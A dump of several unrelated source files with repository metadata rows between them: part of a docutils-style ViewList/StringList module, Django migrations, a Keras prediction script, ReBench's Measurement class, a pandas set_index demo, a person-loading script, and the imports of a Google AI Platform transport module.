            self.items = initlist.items[:]
        elif initlist is not None:
            self.data = list(initlist)
            if items:
                self.items = items
            else:
                self.items = [(source, i) for i in range(len(initlist))]
        # Invariant: data and items are always kept the same length.
        assert len(self.data) == len(self.items), 'data mismatch'
    def __str__(self):
        return str(self.data)
    def __repr__(self):
        return '%s(%s, items=%s)' % (self.__class__.__name__,
                                     self.data, self.items)
    # All comparisons delegate to the underlying data list, coercing a
    # ViewList operand to its .data first (via __cast).  __cmp__/cmp are
    # Python 2 only.
    def __lt__(self, other): return self.data <  self.__cast(other)
    def __le__(self, other): return self.data <= self.__cast(other)
    def __eq__(self, other): return self.data == self.__cast(other)
    def __ne__(self, other): return self.data != self.__cast(other)
    def __gt__(self, other): return self.data >  self.__cast(other)
    def __ge__(self, other): return self.data >= self.__cast(other)
    def __cmp__(self, other): return cmp(self.data, self.__cast(other))
    def __cast(self, other):
        if isinstance(other, ViewList):
            return other.data
        else:
            return other
    def __contains__(self, item): return item in self.data
    def __len__(self): return len(self.data)
    # The __getitem__()/__setitem__() methods check whether the index
    # is a slice first, since indexing a native list with a slice object
    # just works.
    def __getitem__(self, i):
        if isinstance(i, types.SliceType):
            assert i.step in (None, 1),  'cannot handle slice with stride'
            # Slicing creates a linked child view of this list.
            return self.__class__(self.data[i.start:i.stop],
                                  items=self.items[i.start:i.stop],
                                  parent=self, parent_offset=i.start or 0)
        else:
            return self.data[i]
    def __setitem__(self, i, item):
        if isinstance(i, types.SliceType):
            assert i.step in (None, 1), 'cannot handle slice with stride'
            if not isinstance(item, ViewList):
                raise TypeError('assigning non-ViewList to ViewList slice')
            self.data[i.start:i.stop] = item.data
            self.items[i.start:i.stop] = item.items
            assert len(self.data) == len(self.items), 'data mismatch'
            # Propagate the change upward so the parent stays in sync.
            if self.parent:
                self.parent[(i.start or 0) + self.parent_offset
                            : (i.stop or len(self)) + self.parent_offset] = item
        else:
            self.data[i] = item
            if self.parent:
                self.parent[i + self.parent_offset] = item
    def __delitem__(self, i):
        # NOTE(review): if `i` is a slice and a parent exists, the two
        # ``del`` statements below may already have run before
        # ``i + self.parent_offset`` raises TypeError — verify that the
        # except branch cannot delete from data/items a second time.
        try:
            del self.data[i]
            del self.items[i]
            if self.parent:
                del self.parent[i + self.parent_offset]
        except TypeError:
            assert i.step is None, 'cannot handle slice with stride'
            del self.data[i.start:i.stop]
            del self.items[i.start:i.stop]
            if self.parent:
                del self.parent[(i.start or 0) + self.parent_offset
                                : (i.stop or len(self)) + self.parent_offset]
    def __add__(self, other):
        if isinstance(other, ViewList):
            # Concatenation produces a new, unlinked list.
            return self.__class__(self.data + other.data,
                                  items=(self.items + other.items))
        else:
            raise TypeError('adding non-ViewList to a ViewList')
    def __radd__(self, other):
        if isinstance(other, ViewList):
            return self.__class__(other.data + self.data,
                                  items=(other.items + self.items))
        else:
            raise TypeError('adding ViewList to a non-ViewList')
    def __iadd__(self, other):
        if isinstance(other, ViewList):
            # NOTE(review): `self.items` is not extended here, which breaks
            # the data/items length invariant asserted in __init__ —
            # compare extend(); verify against upstream docutils.
            self.data += other.data
        else:
            raise TypeError('argument to += must be a ViewList')
        return self
    def __mul__(self, n):
        return self.__class__(self.data * n, items=(self.items * n))
    __rmul__ = __mul__
    def __imul__(self, n):
        self.data *= n
        self.items *= n
        return self
    def extend(self, other):
        if not isinstance(other, ViewList):
            raise TypeError('extending a ViewList with a non-ViewList')
        # Mirror the extension into the parent before changing self.
        if self.parent:
            self.parent.insert(len(self.data) + self.parent_offset, other)
        self.data.extend(other.data)
        self.items.extend(other.items)
    def append(self, item, source=None, offset=0):
        # Without a source, `item` must be a ViewList and is spliced in.
        if source is None:
            self.extend(item)
        else:
            if self.parent:
                self.parent.insert(len(self.data) + self.parent_offset, item,
                                   source, offset)
            self.data.append(item)
            self.items.append((source, offset))
    def insert(self, i, item, source=None, offset=0):
        if source is None:
            if not isinstance(item, ViewList):
                raise TypeError('inserting non-ViewList with no source given')
            self.data[i:i] = item.data
            self.items[i:i] = item.items
            if self.parent:
                # Normalize a possibly-negative index before propagating.
                index = (len(self.data) + i) % len(self.data)
                self.parent.insert(index + self.parent_offset, item)
        else:
            self.data.insert(i, item)
            self.items.insert(i, (source, offset))
            if self.parent:
                index = (len(self.data) + i) % len(self.data)
                self.parent.insert(index + self.parent_offset, item,
                                   source, offset)
    def pop(self, i=-1):
        if self.parent:
            # Normalize a possibly-negative index before propagating.
            index = (len(self.data) + i) % len(self.data)
            self.parent.pop(index + self.parent_offset)
        self.items.pop(i)
        return self.data.pop(i)
    def trim_start(self, n=1):
        """
        Remove items from the start of the list, without touching the parent.
        """
        if n > len(self.data):
            raise IndexError("Size of trim too large; can't trim %s items "
                             "from a list of size %s." % (n, len(self.data)))
        elif n < 0:
            raise IndexError('Trim size must be >= 0.')
        del self.data[:n]
        del self.items[:n]
        # The view shrinks from the front, so its offset into the parent
        # grows by the same amount.
        if self.parent:
            self.parent_offset += n
    def trim_end(self, n=1):
        """
        Remove items from the end of the list, without touching the parent.
        """
        if n > len(self.data):
            raise IndexError("Size of trim too large; can't trim %s items "
                             "from a list of size %s." % (n, len(self.data)))
        elif n < 0:
            raise IndexError('Trim size must be >= 0.')
        del self.data[-n:]
        del self.items[-n:]
    def remove(self, item):
        index = self.index(item)
        del self[index]
    def count(self, item): return self.data.count(item)
    def index(self, item): return self.data.index(item)
    def reverse(self):
        # Reordering cannot be mirrored into the parent; the link is cut.
        self.data.reverse()
        self.items.reverse()
        self.parent = None
    def sort(self, *args):
        # Sort data and item metadata together, pairwise.  Python 2 only:
        # relies on zip() returning a list with a .sort() method.
        tmp = zip(self.data, self.items)
        tmp.sort(*args)
        self.data = [entry[0] for entry in tmp]
        self.items = [entry[1] for entry in tmp]
        self.parent = None
    def info(self, i):
        """Return source & offset for index `i`."""
        try:
            return self.items[i]
        except IndexError:
            if i == len(self.data):     # Just past the end
                return self.items[i - 1][0], None
            else:
                raise
    def source(self, i):
        """Return source for index `i`."""
        return self.info(i)[0]
    def offset(self, i):
        """Return offset for index `i`."""
        return self.info(i)[1]
    def disconnect(self):
        """Break link between this list and parent list."""
        self.parent = None
    def xitems(self):
        """Return iterator yielding (source, offset, value) tuples."""
        for (value, (source, offset)) in zip(self.data, self.items):
            yield (source, offset, value)
    def pprint(self):
        """Print the list in `grep` format (`source:offset:value` lines)"""
        # Python 2 print statement.
        for line in self.xitems():
            print "%s:%d:%s" % line
class StringList(ViewList):
    """A `ViewList` with string-specific methods."""
    def trim_left(self, length, start=0, end=sys.maxint):
        """
        Trim `length` characters off the beginning of each item, in-place,
        from index `start` to `end`. No whitespace-checking is done on the
        trimmed text. Does not affect slice parent.
        """
        self.data[start:end] = [line[length:]
                                for line in self.data[start:end]]
    def get_text_block(self, start, flush_left=0):
        """
        Return a contiguous block of text.
        If `flush_left` is true, raise `UnexpectedIndentationError` if an
        indented line is encountered before the text block ends (with a blank
        line).
        """
        end = start
        last = len(self.data)
        # Scan forward until a blank line (or EOF) terminates the block.
        while end < last:
            line = self.data[end]
            if not line.strip():
                break
            if flush_left and (line[0] == ' '):
                source, offset = self.info(end)
                raise UnexpectedIndentationError(self[start:end], source,
                                                 offset + 1)
            end += 1
        return self[start:end]
    def get_indented(self, start=0, until_blank=0, strip_indent=1,
                     block_indent=None, first_indent=None):
        """
        Extract and return a StringList of indented lines of text.
        Collect all lines with indentation, determine the minimum indentation,
        remove the minimum indentation from all indented lines (unless
        `strip_indent` is false), and return them. All lines up to but not
        including the first unindented line will be returned.
        :Parameters:
          - `start`: The index of the first line to examine.
          - `until_blank`: Stop collecting at the first blank line if true.
          - `strip_indent`: Strip common leading indent if true (default).
          - `block_indent`: The indent of the entire block, if known.
          - `first_indent`: The indent of the first line, if known.
        :Return:
          - a StringList of indented lines with mininum indent removed;
          - the amount of the indent;
          - a boolean: did the indented block finish with a blank line or EOF?
        """
        indent = block_indent # start with None if unknown
        end = start
        if block_indent is not None and first_indent is None:
            first_indent = block_indent
        if first_indent is not None:
            # The first line's indent is known, so skip examining it.
            end += 1
        last = len(self.data)
        while end < last:
            line = self.data[end]
            if line and (line[0] != ' '
                         or (block_indent is not None
                             and line[:block_indent].strip())):
                # Line not indented or insufficiently indented.
                # Block finished properly iff the last indented line blank:
                blank_finish = ((end > start)
                                and not self.data[end - 1].strip())
                break
            stripped = line.lstrip()
            if not stripped: # blank line
                if until_blank:
                    blank_finish = 1
                    break
            elif block_indent is None:
                # Track the minimum indent seen over all non-blank lines.
                line_indent = len(line) - len(stripped)
                if indent is None:
                    indent = line_indent
                else:
                    indent = min(indent, line_indent)
            end += 1
        else:
            blank_finish = 1 # block ends at end of lines
        block = self[start:end]
        if first_indent is not None and block:
            # Trim the known first-line indent separately.
            block.data[0] = block.data[0][first_indent:]
        if indent and strip_indent:
            block.trim_left(indent, start=(first_indent is not None))
        return block, indent or 0, blank_finish
    def get_2D_block(self, top, left, bottom, right, strip_indent=1):
        # Extract the rectangular region [top:bottom] x [left:right],
        # optionally stripping the common leading indent of the result.
        block = self[top:bottom]
        indent = right
        for i in range(len(block.data)):
            block.data[i] = line = block.data[i][left:right].rstrip()
            if line:
                indent = min(indent, len(line) - len(line.lstrip()))
        if strip_indent and 0 < indent < right:
            block.data = [line[indent:] for line in block.data]
        return block
    def pad_double_width(self, pad_char):
        """
        Pad all double-width characters in self by appending `pad_char` to each.
        For East Asian language support.
        """
        if hasattr(unicodedata, 'east_asian_width'):
            east_asian_width = unicodedata.east_asian_width
        else:
            return # new in Python 2.4
        for i in range(len(self.data)):
            line = self.data[i]
            if isinstance(line, unicode):
                new = []
                for char in line:
                    new.append(char)
                    if east_asian_width(char) in 'WF': # 'W'ide & 'F'ull-width
                        new.append(pad_char)
                self.data[i] = ''.join(new)
    def replace(self, old, new):
        """Replace all occurrences of substring `old` with `new`."""
        for i in range(len(self.data)):
            self.data[i] = self.data[i].replace(old, new)
# Exception hierarchy: every state machine error derives from
# `StateMachineError`, so callers can catch the whole family at once.
class StateMachineError(Exception): pass
class UnknownStateError(StateMachineError): pass
class DuplicateStateError(StateMachineError): pass
class UnknownTransitionError(StateMachineError): pass
class DuplicateTransitionError(StateMachineError): pass
class TransitionPatternNotFound(StateMachineError): pass
class TransitionMethodNotFound(StateMachineError): pass
class UnexpectedIndentationError(StateMachineError): pass
# The two "correction" exceptions below are control-flow signals, not
# errors; they deliberately derive from Exception, not StateMachineError.
class TransitionCorrection(Exception):
    """
    Raise from within a transition method to switch to another transition.
    Raise with one argument, the new transition name.
    """
class StateCorrection(Exception):
    """
    Raise from within a transition method to switch to another state.
    Raise with one or two arguments: new state name, and an optional new
    transition name.
    """
def string2lines(astring, tab_width=8, convert_whitespace=0,
                 whitespace=re.compile('[\v\f]')):
    """
    Split `astring` into a list of one-line strings, with tabs expanded
    and trailing whitespace stripped.

    Tabs are expanded with 1 to `tab_width` spaces so that the next
    character's column becomes a multiple of `tab_width` (8 by default).
    If `convert_whitespace` is true, form feeds and vertical tabs are
    converted to spaces first.

    The `whitespace` parameter is a shared, pre-compiled default pattern;
    callers normally leave it alone.
    """
    if convert_whitespace:
        astring = whitespace.sub(' ', astring)
    lines = astring.splitlines()
    return [line.expandtabs(tab_width).rstrip() for line in lines]
def _exception_data():
"""
Return exception information:
- the exception's class name;
- the exception object;
- the name of the file containing the offending code;
- the line number of the offending code;
- the function name of the offending code.
"""
type, value, traceback = sys.exc_info()
while traceback.tb_next:
traceback = traceback.tb_next
code = traceback.tb_frame.f_code
return (type.__name__, value, code.co_filename, traceback.tb_lineno,
code.co_name)
| [
"akio.xd@gmail.com"
] | akio.xd@gmail.com |
0beec97f573151df61de82f9967c3d1b03d1668c | 46a1ff4b289e95691b7525cb4b6b1e5688c58f55 | /users/migrations/0017_auto_20180411_2134.py | 6c695bf0313e39afda5a16dbaf00ce4719d20d29 | [] | no_license | hakujyo/blogproject | cc1293a9fe8bee283d9a9ea7abb90f7e2ef40629 | 3aa1c680bde9eb2249d96a0028a135305cc5863d | refs/heads/master | 2021-09-15T00:28:21.445134 | 2018-05-22T20:32:57 | 2018-05-22T20:32:57 | 114,651,181 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 453 | py | # Generated by Django 2.0 on 2018-04-11 13:34
from django.conf import settings
from django.db import migrations, models
class Migration(migrations.Migration):
    """Auto-generated: redefine ``User.friends`` as a plain (symmetrical)
    many-to-many relation to the project's user model."""
    dependencies = [
        ('users', '0016_auto_20180411_1603'),
    ]
    operations = [
        migrations.AlterField(
            model_name='user',
            name='friends',
            # settings.AUTH_USER_MODEL keeps the target swappable.
            field=models.ManyToManyField(to=settings.AUTH_USER_MODEL),
        ),
    ]
| [
"hakujyo0518@gmail.com"
] | hakujyo0518@gmail.com |
33ee38e07d156d430139a621d07d3c3ca342f8c7 | 3c6b74eaeacb72a4de4af17eeab76889a78c5b56 | /tensorflow/testClassify.py | 24b6d069785414f3040dabff98ad31c0c1b79356 | [] | no_license | tkz1996/selfdrivingcar | 86aaad9b43e9b1fb2a261b9fcf56bc4a8e05de72 | 928bc11797036deb46342e5ca5cb990d38ebabe6 | refs/heads/master | 2023-06-16T14:16:58.350637 | 2021-07-16T15:45:43 | 2021-07-16T15:45:43 | 338,084,046 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 389 | py | import tensorflow as tf
from tensorflow import keras
import numpy as np
from cv2 import imread, IMREAD_GRAYSCALE
# Load a saved Keras model and run a single-image prediction.
pathToFolder = 'laneDirectionModel/'
model = keras.models.load_model(pathToFolder)
model.summary()
# Read the test image as a single-channel (grayscale) array.
image = imread('test.jpg', IMREAD_GRAYSCALE)
# Add trailing channel and leading batch dimensions: (1, H, W, 1),
# as expected by model.predict for a single sample.
image = np.expand_dims(image, -1)
image = np.expand_dims(image, 0)
predictions = model.predict(image, verbose=1)
print(predictions) | [
"tkz1996@live.com"
] | tkz1996@live.com |
f60472dc9f2c47ee9077d7de07554b3dae6f0215 | 5c72f7709e501bd0ca3c5dc1e1f21cfffda13582 | /rebench/model/measurement.py | 40af4d69df6564115af83afce35a6769e7585c55 | [] | no_license | lhoste-bell/ReBench | 74ccb400aa5f262b56659afac3b7db873bd6a8d2 | 0f5c678b045b5208e9a2bed01629c780bef52da5 | refs/heads/master | 2021-01-17T07:57:14.440676 | 2016-05-23T19:25:58 | 2016-05-23T19:25:58 | 60,706,933 | 0 | 0 | null | 2016-06-08T15:06:26 | 2016-06-08T15:06:25 | null | UTF-8 | Python | false | false | 2,563 | py | # Copyright (c) 2009-2014 Stefan Marr <http://www.stefan-marr.de/>
#
# Permission is hereby granted, free of charge, to any person obtaining a copy
# of this software and associated documentation files (the "Software"), to
# deal in the Software without restriction, including without limitation the
# rights to use, copy, modify, merge, publish, distribute, sublicense, and/or
# sell copies of the Software, and to permit persons to whom the Software is
# furnished to do so, subject to the following conditions:
#
# The above copyright notice and this permission notice shall be included in
# all copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
# AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING
# FROM, OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS
# IN THE SOFTWARE.
from datetime import datetime
from .run_id import RunId
class Measurement(object):
    """
    A single measured data point for one criterion of a benchmark run.

    Carries the numeric `value`, its `unit`, the owning `run_id`, the
    `criterion` name ('total' by default), and a `timestamp` (defaults to
    the time of construction).  Instances round-trip through the flat
    string representation produced by `as_str_list()` and consumed by
    `from_str_list()`.
    """

    # Serialization format for timestamps (ISO-8601 without timezone).
    TIME_FORMAT = "%Y-%m-%dT%H:%M:%S"

    def __init__(self, value, unit, run_id, criterion = 'total',
                 timestamp = None):
        self._value = value
        self._unit = unit
        self._run_id = run_id
        self._criterion = criterion
        self._timestamp = timestamp if timestamp else datetime.now()

    def is_total(self):
        """True if this measurement reports the overall 'total' criterion."""
        return self._criterion == 'total'

    @property
    def criterion(self):
        return self._criterion

    @property
    def value(self):
        return self._value

    @property
    def unit(self):
        return self._unit

    @property
    def timestamp(self):
        return self._timestamp

    @property
    def run_id(self):
        return self._run_id

    def as_str_list(self):
        """Serialize to a flat string list (inverse of `from_str_list`)."""
        bracketed_time = "[" + self._timestamp.strftime(self.TIME_FORMAT) + "]"
        own_fields = [bracketed_time,
                      "%f" % self._value,
                      self._unit,
                      self._criterion]
        return own_fields + self._run_id.as_str_list()

    @classmethod
    def from_str_list(cls, data_store, str_list):
        """Reconstruct a `Measurement` from `as_str_list()` output."""
        # str_list[0] is "[<timestamp>]"; strip the brackets before parsing.
        timestamp = datetime.strptime(str_list[0][1:-1], cls.TIME_FORMAT)
        run_id = RunId.from_str_list(data_store, str_list[4:])
        return Measurement(float(str_list[1]), str_list[2], run_id,
                           str_list[3], timestamp)
| [
"git@stefan-marr.de"
] | git@stefan-marr.de |
ce4e263dde23b1fdcc64494a2f9403ddfdfb1d07 | f5f40cee05de885ee059bcf4760e16f3f01ed23c | /ims/exceptions.py | c359b0a8626603fd8084e35af12b1dcce84a8c5e | [] | no_license | MarsWizard/imagebank | 68693207d71024bd0cdc608984d80fc0c7b6f751 | 916a9f087194052e77751fd8d52c930e77a7b04d | refs/heads/master | 2021-04-17T16:57:55.356760 | 2020-10-20T05:34:23 | 2020-10-20T05:34:23 | 249,460,889 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 452 | py | ERROR_OBJECT_NOT_FOUND = 10001
PARAMETER_REQUIRED = 10002  # a required request parameter is missing
INVALID_IMAGE_FILE = 10003  # uploaded file could not be read as an image
class ImsException(Exception):
    """
    Base class for IMS application errors, carrying a numeric `error_code`
    and a human-readable `error_msg`.

    Derives from ``Exception`` rather than ``BaseException``: per PEP 352,
    ``BaseException`` is reserved for interpreter-exit signals
    (SystemExit, KeyboardInterrupt), and generic ``except Exception``
    handlers would otherwise miss these application errors.
    """
    def __init__(self, error_code, error_msg):
        # Pass the message to Exception so str(e) and pickling behave
        # normally (the original left args empty, making str(e) == '').
        super(ImsException, self).__init__(error_msg)
        self.error_code = error_code
        self.error_msg = error_msg
class InvalidImageFile(ImsException):
    """Raised when an uploaded file cannot be parsed as an image; maps to
    the INVALID_IMAGE_FILE error code."""
    def __init__(self):
        # Restored the closing line, which was corrupted by extraction
        # residue in the source dump.
        super(InvalidImageFile, self).__init__(INVALID_IMAGE_FILE,
                                               'Invalid Image File')
"pbleester@gmail.com"
] | pbleester@gmail.com |
477f89560ab67fce9dddcc436863915129dc25bd | 707bd0e873ae25146f1341b40d8efbf5134025af | /unifypage/migrations/0004_auto_20161021_0933.py | 781e95f7baa886a438135233d4469070f9415423 | [] | no_license | yosmangel/djangoLn2x | 76acd748adfddb5b21ad3e0342e3d7eb19b81bc9 | 24d068458e8271aacfa98d762c0dc117e65d41cf | refs/heads/master | 2021-04-27T07:55:36.488176 | 2017-06-01T17:48:26 | 2017-06-01T17:48:26 | 122,641,881 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 600 | py | # -*- coding: utf-8 -*-
# Generated by Django 1.10.2 on 2016-10-21 08:33
from __future__ import unicode_literals
from django.db import migrations, models
class Migration(migrations.Migration):
    """Auto-generated: replace ``Row.background_url`` with a free-form
    ``Row.background`` CharField."""
    dependencies = [
        ('unifypage', '0003_auto_20161020_1746'),
    ]
    operations = [
        # Drop the old URL-specific field...
        migrations.RemoveField(
            model_name='row',
            name='background_url',
        ),
        # ...and add the new, optional text field in its place.
        migrations.AddField(
            model_name='row',
            name='background',
            field=models.CharField(blank=True, max_length=500, verbose_name='Background'),
        ),
    ]
| [
"yosmangel_yk@hotmail.com"
] | yosmangel_yk@hotmail.com |
371df3e6878cc771e173581fde70c7a4c4345bbc | 10450b2dcc29b47c9773065db3b3767481b9cbe0 | /setindex.py | 78d78fbfef2ad9044dcab693df10fb6c2c009607 | [] | no_license | YukiKis/deepage | c6ff1e18a09a5a35cc4ee8b291c008493b4c92a3 | c9d0e4a0eabd97d425d941e59765757f595ee03d | refs/heads/master | 2023-01-23T02:39:38.655383 | 2020-12-09T15:33:06 | 2020-12-09T15:33:06 | 319,202,030 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 419 | py | # -*- coding: utf-8 -*-
"""
Created on Mon Dec 7 23:36:59 2020
@author: s1430
"""
import pandas as pd
# Demo of pandas.DataFrame.set_index options.
# Assumes sample_index.csv has at least "state" and "age" columns — TODO confirm.
df = pd.read_csv("sample_index.csv")
print(df)
# Use the "state" column as the index (the column is moved into the index).
print(df.set_index("state"))
# Build a two-level MultiIndex from "state" and "age".
print(df.set_index(["state", "age"]))
# drop=False keeps "state" as a regular column as well as the index.
print(df.set_index(["state"], drop=False))
# append=True adds "state" to the existing index instead of replacing it.
print(df.set_index(["state"], append=True))
# inplace=True mutates df and returns None, so this line prints "None".
print(df.set_index(["state"], inplace=True))
print(df)
# verify_integrity=True raises ValueError if the new index has duplicates
# — NOTE(review): likely to abort here if any age repeats in the data.
print(df.set_index(["age"], verify_integrity=True))
"s143068@gmail.com"
] | s143068@gmail.com |
027cf4e57a5d81205b343ce7fc1c856aeb43e5f9 | 0125a43527a0cd4775aa264401360037bbadf6c2 | /load_people_assigned.py | 35938303f6bec3d955ebe4c113892b8fc3ef0b15 | [] | no_license | HsiuPing/BMSE_2_HW5 | 34d69b47e115293a1a0972c0a3caf8cdb6563533 | 0846ef0df14df09a04c7b99e998ec03873b8bd29 | refs/heads/master | 2021-04-27T00:09:18.787201 | 2018-03-04T04:55:09 | 2018-03-04T04:55:09 | 123,758,146 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 6,396 | py | """ Main program that loads related people from a file
:Author: Arthur Goldberg <Arthur.Goldberg@mssm.edu>
:Date: 2018-02-21
:Copyright: 2018, Arthur Goldberg
:License: MIT
"""
import sys
import argparse
import logging
import related_person
from related_person import Gender, RelatedPerson, RelatedPersonError
class RawPersonRecord(object):
    """One unvalidated person row, exactly as read from the input file."""

    # Number of tab-separated fields expected on every input line.
    FIELDS = 5

    def __init__(self, id, name, father_id, mother_id, gender, row):
        """Store the raw field values plus the input row number."""
        self.id = id
        self.name = name
        self.father_id = father_id
        self.mother_id = mother_id
        self.gender = gender
        self.row = row

    @staticmethod
    def make_from_line(line, row):
        """Parse one tab-separated line into a RawPersonRecord.

        Raises ValueError when the line does not contain exactly
        FIELDS fields.
        """
        fields = line.strip().split('\t')
        if len(fields) != RawPersonRecord.FIELDS:
            raise ValueError("row {}: has {} fields, not {}".format(
                row, len(fields), RawPersonRecord.FIELDS))
        id, name, father_id, mother_id, gender = fields
        return RawPersonRecord(id, name, father_id, mother_id, gender, row)
class LoadPeople(object):
    """Load a TSV file of people, validate the records, and build an index
    of RelatedPerson objects linked to their parents.

    Processing runs in phases:
      phase1 -- parse the command line (input file, optional error output)
      phase2 -- read raw records, check IDs and genders, create RelatedPersons
      phase3 -- verify parent references and wire up mother/father links
    """

    # Parent-ID value meaning "no parent recorded".
    NULL_ID = '0'

    def __init__(self):
        # Raw, unvalidated records in input order.
        self.buffer = []
        # Map: person ID -> validated RelatedPerson.
        self.people_index = {}

    @staticmethod
    def all_people(people_index):
        """Print every person in people_index, ordered by ID."""
        for id in sorted(people_index.keys()):
            print(str(people_index[id]))

    def phase1(self):
        """Parse the command line and return the argparse namespace.

        Bug fix: the original called ``parser.parse_args()`` twice — once to
        print and once to return.  Every call opens the ``FileType``
        arguments, so the printed namespace leaked open file handles.
        Parse once and reuse the result.
        """
        parser = argparse.ArgumentParser()
        parser.add_argument("infile", type=argparse.FileType('r'))
        parser.add_argument("--outfile", '-o', type=argparse.FileType('a+'))
        args = parser.parse_args()
        print(args)
        return args

    def _report_errors(self, args, header, errors):
        """Write *header* plus the collected *errors* to args.outfile,
        or to stdout when no outfile was given.

        Shared by phase2 and phase3, which previously duplicated this logic.
        Note the ``with`` closes args.outfile after writing.
        """
        text_1 = header
        text_2 = '\n'.join(errors)
        if args.outfile:
            with args.outfile as o:
                o.write(text_1 + text_2)
        else:
            print(text_1, text_2)

    def phase2(self):
        """Read the input file, validate IDs and genders, and create a
        RelatedPerson for every well-formed, non-duplicated record.

        Malformed lines and duplicate IDs are collected and reported via
        _report_errors().
        """
        row = 0
        errors = []
        bad_ids = set()
        args = self.phase1()
        filename = args.infile
        with filename as f:
            for line in f:
                row += 1
                try:
                    self.buffer.append(RawPersonRecord.make_from_line(line, row))
                except ValueError as e:
                    errors.append(str(e))
        # Check IDs and genders, and create RelatedPersons.
        for raw_person in self.buffer:
            try:
                # A repeated ID invalidates every record using it, including
                # the first occurrence that was already indexed.
                if raw_person.id in self.people_index:
                    bad_ids.add(raw_person.id)
                    del self.people_index[raw_person.id]
                if raw_person.id in bad_ids:
                    raise RelatedPersonError("duplicate ID: {}".format(raw_person.id))
                # Gender.get_gender raises RelatedPersonError on bad values
                # — presumably; confirm against related_person module.
                gender = Gender.get_gender(raw_person.gender)
                # Local renamed from `related_person` to avoid shadowing the
                # imported module of the same name.
                person = RelatedPerson(raw_person.id, raw_person.name, gender)
                self.people_index[raw_person.id] = person
            except RelatedPersonError as e:
                errors.append("row {}: {}".format(raw_person.row, str(e)))
                bad_ids.add(raw_person.id)
        if errors:
            self._report_errors(args, '\n- individual errors -', errors)

    def check_parent(self, raw_person, parent):
        """Raise RelatedPersonError if raw_person's mother/father ID is
        non-null but absent from people_index.

        *parent* is the literal string 'mother' or 'father'.
        """
        if parent == 'mother':
            if raw_person.mother_id != LoadPeople.NULL_ID:
                if raw_person.mother_id not in self.people_index:
                    raise RelatedPersonError("{} missing mother {}".format(raw_person.id, raw_person.mother_id))
        elif parent == 'father':
            if raw_person.father_id != LoadPeople.NULL_ID:
                if raw_person.father_id not in self.people_index:
                    raise RelatedPersonError("{} missing father {}".format(raw_person.id, raw_person.father_id))

    def set_parent(self, raw_person, parent):
        """Link raw_person's RelatedPerson to its mother or father.

        set_mother/set_father may raise RelatedPersonError (e.g. on a
        gender mismatch) — presumably; confirm against related_person.
        """
        person = self.people_index[raw_person.id]
        if parent == 'mother':
            if raw_person.mother_id != LoadPeople.NULL_ID:
                mother = self.people_index[raw_person.mother_id]
                person.set_mother(mother)
        elif parent == 'father':
            if raw_person.father_id != LoadPeople.NULL_ID:
                father = self.people_index[raw_person.father_id]
                person.set_father(father)

    def phase3(self):
        """Verify every person's parents exist and link them; people with
        broken parent references are removed from the index."""
        errors = []
        bad_ids = set()
        # NOTE(review): this re-parses the command line (re-opening the
        # input file) even though only args.outfile is used here.
        args = self.phase1()
        for raw_person in self.buffer:
            if raw_person.id in self.people_index:
                # Check and set both parents; a failure marks the person bad
                # but the remaining parent is still attempted.
                if raw_person.id not in bad_ids:
                    for parent in ['mother', 'father']:
                        try:
                            self.check_parent(raw_person, parent)
                            self.set_parent(raw_person, parent)
                        except RelatedPersonError as e:
                            errors.append("row {}: for {} {}".format(raw_person.row, raw_person.id, str(e)))
                            bad_ids.add(raw_person.id)
        # Delete all the RelatedPerson entries for the bad people.
        for bad_id in bad_ids:
            del self.people_index[bad_id]
        # Log each RelatedPerson that was fully verified.
        logging.basicConfig(stream=sys.stdout, level=logging.INFO)
        for id in self.people_index:
            # Bug fix: the original passed an extra positional argument to
            # logging.info with no matching placeholder in the message,
            # which makes the logging module raise a formatting error at
            # emit time.  Use lazy %-style arguments instead.
            logging.info('ID:%s is successfully loaded: %s', id, self.people_index[id])
        if errors:
            self._report_errors(args, '\n- relatedness errors -', errors)

    def main(self):
        """Run both processing phases and return the index of loaded people."""
        self.phase2()
        self.phase3()
        return self.people_index
# todo: use the input specified by the CLI
# Use command line such as python load_people_assigned.py test_bad.tsv -o output_error.txt
# NOTE(review): this runs at import time; consider wrapping in an
# `if __name__ == "__main__":` guard so the module can be imported safely.
LoadPeople().main()
| [
"noreply@github.com"
] | HsiuPing.noreply@github.com |
f2b7180d176b4eec46c3794ea9526f5ec48beb91 | 228ebc9fb20f25dd3ed2a6959aac41fd31314e64 | /google/cloud/aiplatform_v1beta1/services/migration_service/transports/base.py | 3405e5f21603a2bae9a6b0b1b8a675b832545a71 | [
"Apache-2.0"
] | permissive | orionnye/python-aiplatform | 746e3df0c75025582af38223829faeb2656dc653 | e3ea683bf754832340853a15bdb0a0662500a70f | refs/heads/main | 2023-08-03T06:14:50.689185 | 2021-09-24T03:24:14 | 2021-09-24T03:24:14 | 410,091,957 | 1 | 0 | Apache-2.0 | 2021-09-24T20:21:01 | 2021-09-24T20:21:00 | null | UTF-8 | Python | false | false | 7,763 | py | # -*- coding: utf-8 -*-
# Copyright 2020 Google LLC
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
import abc
from typing import Awaitable, Callable, Dict, Optional, Sequence, Union
import packaging.version
import pkg_resources
import google.auth # type: ignore
import google.api_core # type: ignore
from google.api_core import exceptions as core_exceptions # type: ignore
from google.api_core import gapic_v1 # type: ignore
from google.api_core import retry as retries # type: ignore
from google.api_core import operations_v1 # type: ignore
from google.auth import credentials as ga_credentials # type: ignore
from google.oauth2 import service_account # type: ignore
